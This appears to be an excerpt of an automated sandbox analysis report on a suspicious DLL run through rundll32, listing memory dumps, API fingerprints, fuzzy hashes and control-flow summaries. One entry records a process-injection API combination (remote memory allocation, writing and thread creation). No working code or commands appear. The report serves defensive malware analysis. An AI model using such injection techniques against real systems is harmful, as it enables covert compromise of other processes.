                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception$FileHeaderRaiseThrow_invalid_parameter_noinfo_noreturn
                                                                                                                      • String ID: cannot use operator[] with a string argument with
                                                                                                                      • API String ID: 1611749442-2766135566
                                                                                                                      • Opcode ID: a7add5ded4a20cda95b4b3d60da19fa7128c3acf4876b3aa335c0ca9d770390e
                                                                                                                      • Instruction ID: a30ffc925e730f63cc89c35fc74b905e988506043f62fa4a043d6612cf840508
                                                                                                                      • Opcode Fuzzy Hash: a7add5ded4a20cda95b4b3d60da19fa7128c3acf4876b3aa335c0ca9d770390e
                                                                                                                      • Instruction Fuzzy Hash: 6641B272204AC891EA92DB25E5103DE7761F78D7E0F549212FBAD07ADADF68C689C700
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                      • Opcode ID: 2f6bac117e9c64a28ee378ede8fe7d4062f245215970e72067292429a2ecbe3c
                                                                                                                      • Instruction ID: e9215d547afdfb7ae36bb631c58771267b4e59003a7ed33eb167d21669a8df37
                                                                                                                      • Opcode Fuzzy Hash: 2f6bac117e9c64a28ee378ede8fe7d4062f245215970e72067292429a2ecbe3c
                                                                                                                      • Instruction Fuzzy Hash: 95418272715A4882EBA18F65E8443EA7761F7987D4F858021FE8D87798DF3CC649C740
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                      • String ID: LCMapStringEx
                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                      • Opcode ID: aa136470c04f54750922b3b7d9728b3fa1d52aa7221cecf1e4fbf481d35cdd9f
                                                                                                                      • Instruction ID: 1426e9033e083328d810d4c964af1471415f2e4abc38788602fc3b5fa8da82aa
                                                                                                                      • Opcode Fuzzy Hash: aa136470c04f54750922b3b7d9728b3fa1d52aa7221cecf1e4fbf481d35cdd9f
                                                                                                                      • Instruction Fuzzy Hash: 0D11F736608B8486D7A2CB56B4803DAB7A5F7CDBD0F548126EE8D83B59DF38C6448B00
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                      • Opcode ID: 3f45dbee98766fe5468453c05f38d203438228ec095d9aa51e92474b39c22aad
                                                                                                                      • Instruction ID: b60cf378d3302ced2315405eddc9469e8ecac8c086673f686eb128210d48837b
                                                                                                                      • Opcode Fuzzy Hash: 3f45dbee98766fe5468453c05f38d203438228ec095d9aa51e92474b39c22aad
                                                                                                                      • Instruction Fuzzy Hash: 83F05E35205B8881FB878B82B5407E52364BB4DBC0F88D025F95A03B54CF38C64DC744
                                                                                                                      APIs
                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 000000018001AA01
                                                                                                                      • TlsSetValue.KERNEL32(?,?,0000EABB3B49FBAC,0000000180016B42,?,?,0000EABB3B49FBAC,0000000180011C25,?,?,?,?,0000000180016D36,?,?,00000000), ref: 000000018001AA18
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                      • String ID: FlsSetValue
                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                      • Opcode ID: fe28caa2cce135917cb9ddf218cb5b10bc14cf2eff41ae8af3362b4de2454d38
                                                                                                                      • Instruction ID: 7f3b35c752c21757f1db10fb95d949ab252f13624666dd095f9e840542a688eb
                                                                                                                      • Opcode Fuzzy Hash: fe28caa2cce135917cb9ddf218cb5b10bc14cf2eff41ae8af3362b4de2454d38
                                                                                                                      • Instruction Fuzzy Hash: 8BE092B1204A4891FF874B90F5503E56322AB4C7D0F88D022BD0906396CF38CB8CC300
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DownlevelLocaleName__crttry_get_function
                                                                                                                      • String ID: LocaleNameToLCID
                                                                                                                      • API String ID: 404522899-2050040251
                                                                                                                      • Opcode ID: 753a1e2ca4a7c4e14edabfe687945710c6edb93721609b4771d2433c241a515f
                                                                                                                      • Instruction ID: 5b4ece58d35bd8437c3b79418c835bfcfaf0ac31156dd0188a9fb0c6fc65be12
                                                                                                                      • Opcode Fuzzy Hash: 753a1e2ca4a7c4e14edabfe687945710c6edb93721609b4771d2433c241a515f
                                                                                                                      • Instruction Fuzzy Hash: 9AE01235219A4895FB879B95F5913E93362AB8D7C0F98D022F91906396CF38CB4DC714
                                                                                                                      APIs
                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 0000000180011705
                                                                                                                      • TlsSetValue.KERNEL32(?,?,00000000,000000018000FCFA,?,?,?,000000018000FC95,?,?,?,?,000000018000F1AA), ref: 000000018001171C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                      • String ID: FlsSetValue
                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                      • Opcode ID: 22eeb772723b431fdf52d06708df64909394b7b854e5ab45bda407cd80ffd7de
                                                                                                                      • Instruction ID: 3cc47aad495fecb8ad6987c83b9020599e1b3a5e6568dcd32a85816c8cc3edcb
                                                                                                                      • Opcode Fuzzy Hash: 22eeb772723b431fdf52d06708df64909394b7b854e5ab45bda407cd80ffd7de
                                                                                                                      • Instruction Fuzzy Hash: 30E092B5604A0892EBDB4B50F4847D42361AB4C7E1F48D026B95D063D5CE38CB8CD354
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception$Throw$FileHeaderRaise
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3102897148-0
                                                                                                                      • Opcode ID: a055ed6aad9b63c0af86c8a89e4476d6b23f75f41965a51dd8ecfe93ef93ad13
                                                                                                                      • Instruction ID: d5fbad0a112b75453b16c0a490e34593e3ae9bf60d8b6f67d57a8b7cc3e1bdf6
                                                                                                                      • Opcode Fuzzy Hash: a055ed6aad9b63c0af86c8a89e4476d6b23f75f41965a51dd8ecfe93ef93ad13
                                                                                                                      • Instruction Fuzzy Hash: A0118F76710A888AE75EFE3298523EA3321EB987C4F14D435FA5E4BA9ADF24C5164300

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:6.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:4.9%
                                                                                                                      Total number of Nodes:245
                                                                                                                      Total number of Limit Nodes:22

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                      • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3172812169-2766056989
                                                                                                                      • Opcode ID: 0eb28147f580e3073132cd4857f7339373183e42c4e03efc949c79a274ad3264
                                                                                                                      • Instruction ID: 9740b8a67545548af73fc701d4c0f3df214f93be1b9708ce57f24a6a41fb1eaa
                                                                                                                      • Opcode Fuzzy Hash: 0eb28147f580e3073132cd4857f7339373183e42c4e03efc949c79a274ad3264
                                                                                                                      • Instruction Fuzzy Hash: 7811B47531575046FA528FAAAC08756A694B789FF0F454338AF79077D4DF39C10A8704
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1867228523.00007DF4F0240000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4F0240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_7df4f0240000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3332741929-2766056989
                                                                                                                      • Opcode ID: a244b4c46065a0b172c05969a3639a80dbbfb73a6b591c48ef82bced5c87c14f
                                                                                                                      • Instruction ID: 4c9a43d86eb8ec3fa90282b683007a6ef1a59bf84b1eafae76d939d2cbb38f15
                                                                                                                      • Opcode Fuzzy Hash: a244b4c46065a0b172c05969a3639a80dbbfb73a6b591c48ef82bced5c87c14f
                                                                                                                      • Instruction Fuzzy Hash: 9771D03161494C8FEF94EF5CC898BA937E1FB98315F10462AE81EC72A1DB74D994CB80
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1867228523.00007DF4F0240000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4F0240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_7df4f0240000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353314856-0
                                                                                                                      • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                      • Instruction ID: 1f51d84387a7173b391353be83027292ec1b2063b66d30f797416cb60d0907b9
                                                                                                                      • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                      • Instruction Fuzzy Hash: C121DF3461494C8FEBA5EB6CCC98BEA37E1FBA8310F404226D41EDB290DE75DE848750
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1799236503.0000029212FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029212FD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_29212fd0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                                                                      • Instruction ID: 66ae8bb1312c9d8c46a63d479f1b3c592a2ca9711104408c41da62ff093ea320
                                                                                                                      • Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                                                                      • Instruction Fuzzy Hash: F5F08170618B408BE744DF2884C963A77E1FB98755F24492EE88987361CB319842CA43
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1799236503.0000029212FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029212FD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_29212fd0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                                                                      • Instruction ID: 8566575effe11dcfca5e96efbe1ad3fc805632cf9930f65de432e3d7c2834eb8
                                                                                                                      • Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                                                                      • Instruction Fuzzy Hash: 0BF05470A24F448BDB08AF2C884A63977D2F7A8745F54452EA448D7361DB35E5468B43

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                      • Instruction ID: ccb7948a99767b49ac44a32642b4dae98553a7bf8f95190c0377a9c11e257a43
                                                                                                                      • Opcode Fuzzy Hash: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                      • Instruction Fuzzy Hash: 78F1DB76259BE4D6E7608B15F49475EB7A0F7C8B80F105015EB8E83BAADF79C498CB00
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1843352576.00007DF4F02B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4F02B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_7df4f02b0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenValue$Query
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3881042660-0
                                                                                                                      • Opcode ID: 626bf157ab92892a21200f7f99e5a6ae81b2c8b077ae05ca6636b539537add79
                                                                                                                      • Instruction ID: eb12e6fe3ee76e0205f349894133a15093fe0e107e50ae6fce22d3ab1681291a
                                                                                                                      • Opcode Fuzzy Hash: 626bf157ab92892a21200f7f99e5a6ae81b2c8b077ae05ca6636b539537add79
                                                                                                                      • Instruction Fuzzy Hash: 3E512F3121894C8FDB95EB1CCC84BE933E1FBE9324F104626A45EC32A4DE75EA948B40

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 73d186ae7e7a30a1d001e304d0e7452e82c9afbcf55bcb3a2e017d0d50acf0a3
                                                                                                                      • Instruction ID: 55a2f69ce5bba9362c10b9a3f5ef62a5af1b519a417f449ae2921efab71fa865
                                                                                                                      • Opcode Fuzzy Hash: 73d186ae7e7a30a1d001e304d0e7452e82c9afbcf55bcb3a2e017d0d50acf0a3
                                                                                                                      • Instruction Fuzzy Hash: 0D51EA76218794DBEB60CF1AE08471ABBA1F3C8B84F151015EA8DC77A5DB79D994CF00

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                      • Instruction ID: e728dd8864aa0518940b5c4f19db60fe91e913cb957f55d61ff212cff7ca0b0e
                                                                                                                      • Opcode Fuzzy Hash: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                      • Instruction Fuzzy Hash: 1451E876618B84C6CB60CB1AF48461AB7A0F7C8BD8F145115EE8E83B6ADB39C594CF00

                                                                                                                       Control-flow Graph

                                                                                                                       • Blocks 26e7a14c0-26e7a14cc and 26e7a14d0-26e7a14d7 (node list omitted, rendered graph in the original); the second block calls SleepEx and branches back to itself.
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                       • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                       • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 0da5a77b1d795fb6707756be2b86fd123b89f025793bdf999121e2e314aa4dac
                                                                                                                      • Instruction ID: 7189fadd19c05f0b16517cb3fcd21573d102caadb62aefbd625eb7048705db04
                                                                                                                      • Opcode Fuzzy Hash: 0da5a77b1d795fb6707756be2b86fd123b89f025793bdf999121e2e314aa4dac
                                                                                                                      • Instruction Fuzzy Hash: 60B0923CA111A8C7FA2727AAA848328EA20BB4E741F1A9469C60A27388CA2595478741

                                                                                                                       Control-flow Graph

                                                                                                                       • Single block 292116a11c0-292116a11f0 calling VirtualAlloc (node list omitted, rendered graph in the original).
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                      • Instruction ID: 8262a10ab272d9c0a90b37f90d44940d5c746677a48ccca2f8ca7a6157593f64
                                                                                                                      • Opcode Fuzzy Hash: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                      • Instruction Fuzzy Hash: 0DD05EB1B04680C3C7248B20E40060A7B60F384744F504018DA8C43B54CA3EC215CF00

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                       • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                       • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryVirtual
                                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                      • API String ID: 1804819252-1534286854
                                                                                                                      • Opcode ID: 5659cc6253d3337fcbf5b9313850b0995babe0cbae9eea9f4b305dcd2399b235
                                                                                                                      • Instruction ID: 298b71a9dd78cf2edb974784e477093bc34c92c347835cd00dc09d550e05ad20
                                                                                                                      • Opcode Fuzzy Hash: 5659cc6253d3337fcbf5b9313850b0995babe0cbae9eea9f4b305dcd2399b235
                                                                                                                      • Instruction Fuzzy Hash: 6541C2BA701B4482FF12EB15E8487A9F7A0F785BD0F464164DA4D0B7A5EB3AC949C780

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                      • Instruction ID: b08b89aab51c6cc187fdb6afd6013d7ca7a7712bf619ad307f38713a2bca3a3b
                                                                                                                      • Opcode Fuzzy Hash: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                      • Instruction Fuzzy Hash: C1511136658B94D6DB64CB19F49432AB7A0F7C8B84F100525FB8E877A6DB3DC498CB04

                                                                                                                       Control-flow Graph

                                                                                                                       • Blocks 26e7a1010-26e7a11ca (node list omitted, rendered graph in the original): two Sleep call sites inside wait loops, calls to _amsg_exit and _initterm, and internal calls to 26e7a2450, 26e7a24c8 and 26e7a24d0. This is C-runtime start-up code, consistent with the Mingw-w64 runtime strings found in the same module.
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                       • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                       • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep_amsg_exit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1015461914-0
                                                                                                                      • Opcode ID: dfb423db6d7f2f99e71afb77657b4e79f394086b29d41546b4ffe580ebe9380d
                                                                                                                      • Instruction ID: 1519187e1003702a2413edca5e237f583de2b2ee7340e728da19977fef088c9a
                                                                                                                      • Opcode Fuzzy Hash: dfb423db6d7f2f99e71afb77657b4e79f394086b29d41546b4ffe580ebe9380d
                                                                                                                      • Instruction Fuzzy Hash: BF418B7D30528485FF63AB1EEC5876AF3A5A744BC4F164025DE088B795EE2BCC899381

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                      • Instruction ID: 061f87bd63ff4c676daad6399f64fffe1f169c943fb037450979fea58f555f91
                                                                                                                      • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                      • Instruction Fuzzy Hash: 67919936619B84C6DB60CB0AE49435AB7A4F7C8BD4F504116EB8E87BA9DF3DC494CB00

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:10.8%
